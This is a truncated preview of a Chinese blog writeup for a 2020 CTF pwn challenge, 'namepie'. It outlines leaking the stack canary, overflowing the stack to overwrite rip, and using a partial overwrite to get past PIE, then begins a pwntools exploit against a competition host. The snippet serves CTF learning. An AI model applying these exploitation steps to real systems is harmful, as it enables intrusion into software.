2020 西普杯 信息安全铁人三项 第四赛区 Writeup
namepie基本情况程序有后门:漏洞第二次输入栈溢出思路pie 保护 partly write 绕过。第一次输入泄露 canary ,第二次覆盖 ripEXPfrom pwn import *context(log_level='debug')# p = process("./namepie")p = remote("172.20.14.168",9999)elf = ELF("./namepie")p.recvuntil(":\n")name = 'skye'.lj
原创
2020-11-09 08:50:59 ·
3774 阅读 ·
8 评论